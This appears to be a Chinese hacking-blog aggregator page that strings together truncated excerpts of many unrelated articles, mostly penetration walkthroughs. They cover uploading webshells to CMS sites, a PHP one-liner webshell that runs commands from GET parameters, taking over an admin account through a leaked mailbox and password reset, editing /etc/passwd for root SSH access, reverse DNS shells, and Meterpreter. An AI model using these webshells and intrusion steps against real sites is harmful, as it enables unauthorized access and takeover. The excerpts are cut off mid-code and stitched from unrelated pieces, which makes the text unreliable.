记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华XAttacker:一种正在扩散中的新型Web漏洞利用工具
背景介绍
作为一名威胁情报分析员,日常工作之一就是及时发现各种新的网络威胁,比如,了解攻击者当下使用的新的漏洞和工具,这样做有利于你尽快的识别并抵御这些威胁。
前几天,在进行日常的蜜罐分析时,发现了一些可疑的流量试图上传一个名为“XAttacker.php”的shell。由于之前没有遇到过这个脚本,于是我把它丢给了Google搜索,找到了该工具的 GitHub页面:
该工具于11月7日被上传到GitHub上,目前已有25颗星星,被Fork过16次(截止到本文发表时的统计数据)。XAttacker的目的针对基于PHP开发的CMS平台进行简单的漏洞利用,在Github页面上展示的攻击列表中,可以看到WordPress、Joomla、DruPal、Prestashop和Lokomedia等主题及可选择的67个漏洞
过滤双引号配置文件插shell
有的asp脚本可能过滤了”双引号的写入。比如配置网站系统配置。一般网站配置是不写入数据库的。就可以插入代码。但是在写入shell的时候是要有双引号,才能正确包含并执行。如果遇到带入双引号则自动过滤了怎么办呢?<% ‘=====配置=====const sitename=”ashker”const onlineuseraborttime=10 %>可以看到网站名称的变量名是sitename。onlineuseraborttime是一个整数赋值。没有双引号包括!如果在此处带入双引号,必然不会执行。那么我们可以来构造下,让他执行代码。<% ‘=====配置=====const sitename=”ashker”con
通过non-interactive shell转发请求到内网
场景如图
如图中所示,这台web server在防火墙之后,且防火墙只允许外界通过80和443端口发送请求到web server。此外,因为获取的shell的用户权限较小(图中为www-data),且是非交互式( non-interactive )shell (PHP中继) ,利用起来非常受限。
这里简单说一下交互式shell(interactive shell)和非交互式shell(non-interactive shell)的区别
interactive shell:需要交互,即shell等待我们的输入,然后立即执行提交的命令,我们平常打开终端,执行命令的就是这种shell
non-interactive shell:不要要交互,通常以shell script方式来执行,shell读取存放在文件中的命令
发布时间:2016-09-25 13:05 |
阅读:117659 | 评论:0 |
标签:内网渗透 non-interactive shell shell web server 内网 转发请求 防火墙
渗透攻防工具篇-后渗透阶段的Meterpreter
前言
熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。
目录
第一节 初识Meterpreter
1.1、什么是Meterpreter
1.2、Meterpreter的优点
第二节 Meterpreter中常用的Shell
2.1、reverse_tcp
2.2、reverse_http
2.3、reverse_https
2.4、bind_tcp
第三节 Meterpreter的常用命令
3.1、基本命令
3.2、文件系统命令
3.3、网络命令
3.4、系统命令
第四节 后渗透攻击模块
4.1、什么是后渗透攻击模块
4.2、后渗透攻击模块的实现原
也谈DNS反弹Shell
0X01 引子
反弹Shell广泛应用于远程控制下的权限维持,通过反转攻(客户端)和受(服务端)的角色,来实现条件限制,尤其是内网情况下的远程连接。
反弹Shell的工具和实现方法多种多样,只要能够让被控端通过网络发送数据到控制端,并且实现数据的解析即可完成控制过程。
最近在继续了解网络协议,于是突然想在DNS数据包中插入一些伪造的命令来实现解析,本来准备自己尝试写一个DNS服务器和DNS请求程序来实现反弹,不过刚动笔就看到了别人开源的程序,于是直接使用别人的程序来学习了。
https://github.com/ahhh/Reverse_DNS_Shell
为了运行测试更方便,去掉了程序中的加解密功能,额外的Python包只需要dns和dnslib
0X02 DNS
为了关联主机和IP地址对应关系而诞生的DNS
phpshe后台任意文件删除(后台无限制拿shell)
90sec@Josephcase 'del':
pe_token_match();
$tpl_name = pe_dbhold($_g_tpl);
if ($tpl_name == 'default') pe_error('默认模板不能删除...');
if ($db->pe_num('setting', array('setting_key'=>'web_tpl', 'setting_value'=>$tpl_name))) {
pe_error('模板正在使用中...');
}
else {
pe_dirdel("{
jo:通过shell命令创建JSON
我尝试损坏shell脚本来创建JSON。你可能已经在某些地方看过这个了:echo '{"name":"Jane"}'如果一个元素包含一个环境变量:open double, close single, add variable, open single, blergh。脚本会以下面的方式打印,但是它的可读性并没有提高很多:printf '{"name": "%s"}n' "Jane"进入 jo:$ jo name=Jane{"name":"Jane"}某天晚上我突然有了想法,我不知道为什么花了我这么长时间:$ jo time=$(date +%s) dir=$HOME{"time":1457195712,"dir":"/Users/jpm"}BAM!Jo尝试引入类型、null、布尔类型、字符
剑走偏锋:细数Shell那些事
说到Shell,我想大家恐怕都不会太陌生。不仅如此,我想大家应该有不少自己的珍藏吧(有珍藏的可以私信我,咱们私聊:P)按平台分类的话,基本上大体可以分为两大类:针对web级别的和针对系统级别的。针对web的大体根据语言不同又分为PHP、JSP、ASP等(这让我不由得想起了那些年,大牛们写过的各种后门……),针对系统级别的一般分为:windows后门和基于unix的后门,不过到现在为止我并没有见过apple后门,大概,是因为我穷吧。言归正传,今天我要跟大家聊的东西,是针对系统的Shell后门。烦请大牛不要喷我,觉得文章水的可以直接略过不谈。0×01 我先分个类这里我按照协议不同来分类。首先,是基于TCP UDP协议的shell这类shell已经遍地都是,而且功能也越来越强大,因为
对某root权限shell的进一步提权(jsp)
对方环境:Readhat+Tomcat+JSP+MYSQL5
shell是root系统权限 也许有的同学问,都是root了还进一步~进到哪?
嗯~说下把,jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧 不吐槽了,在这种情况下呢,我们要远程登陆他的ssh 需要怎么做?
嗯 一般人都懂,直接编辑/etc/passwd和/etc/shadow呗~好吧
通过搜索 发现网上转来转去的并无效果,也就是通常说的无密码即可进入的添加账号~本人测试未果,也许人品?不管~进入backtrack5 直接
cat /etc/passwd
复制root那一行 然后继续
cat /
linux下shell命令的常用快捷键
.Nwj258 { display:none; }
下面是一些shell的常用快捷键,快捷键玩熟悉了在一定程度上是可以提高工作效率滴… 未经允许严禁转载
Ctrl + a 切换到命令行开始 未经允许严禁转载
Ctrl + e 切换到命令行末尾 采集者烂JJ
Ctrl + l 清除屏幕内容 Shell
Ctrl + u 清除光标之前的内容 采集者烂JJ
Ctrl + k 清除光标之后的内容 未经允许严禁转载
Ctrl + h 类似于退格键 leo108's blog
Ctrl + r 在历史命令中查找 (这个非常好用,输入关键字就调出以前的命令了) linux下shell命令的常用快捷键
Ctrl + c 终止命令 采集者烂JJ
Ctrl + d 退出shell linux
Ct
HDWiki V5.1百科系统后台过安全狗拿shell
偶遇一hdwiki百科系统站,前台在词条创建人处发现一管理员
进接通过账号社进后台,后台工能很强大,但是发现限权不够
在会员管理处发现还存在超级管理员这类账号
社工admin无果
反回后台,发现管理员帐号可以对网站的邮箱进行配置
用的腾讯企业邮箱,通过查看源码直接获取邮箱密码
反回网站前台,在密码找回处填上刚才找到的admin邮箱,admin的密码找回链接会通过刚找到的邮箱发送
在网页登录刚才的腾讯腾讯企业邮箱,在发件箱中看到admin的密码找回链接
直接重置admin密码,再次登录后台,看到文件管理处很强大,可以新建文件也可以上传
直接新建大马,被安全狗档住了
新建getshell.php,
代码
<?php $remotecode = $_REQUEST['code
管家婆软件管理系统拿shell
春日多娇,春意盎然,鄙人一位好友晚上因此寂寞难耐,于是乎先前扔我一站让我跟他一起日。打开一看,管家婆,任我行软件。貌似在哪里听过。
(PS:似如此风骚的名字其实都耳熟)。问问朋友,结果是他在某群里看到的,一个中型企业管理系统。恩。就当练练手吧。先百度了下C段,
找了个域名日进去,正猜着目录(这CMS是全静态,相当蛋疼)。然而好友相当速度地发来一个图。
http://www.xxx.com/admin/html/
直接进去了。登入后台首页并无cookie或session验证。
说多了都是泪啊。。这老小子太快了。
进去以后,发现aspx的站。为了分头行事方便,当然先加个多余的管理再说。。鬼知道他有没有对单账户多session做限制。在里面找到一个管理添加,点开:
好嘛。虽然进入后台没限制,具体操作还是要求coo
Shell实现FTP上传文件夹
#!/bin/bash
updir=/root/sk #要上传的文件夹
todir=sk #目标文件夹
ip=127.0.0.1 #服务器
user=leo #ftp用户名
password=123456 #ftp密码
sss=`find $updir -type d -printf $todir/'%Pn'| awk '{if ($0 == "")next;print "mkdir " $0}'`
aaa=`find $updir -type f -printf 'put %p %P n'`
ftp -nv $ip <<EOF
user $user $password
type binary
prom
Linux版的”中国菜刀”––WEBhandler
安装:root@ashker:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.ziproot@ashker:/pen/door# unzip webhandler.zip root@ashker:/pen/door# cd webhandlerroot@ashker:/pen/door/webhandler# apt-get install python-setuptools root@ashker:/pen/door/webhandler# easy_install argparse客服端使用GET提交:root@ashker:/var/www# echo '<?php system($_GET['cmd']); ?&
公告
九层之台,起于累土;黑客之术,始于阅读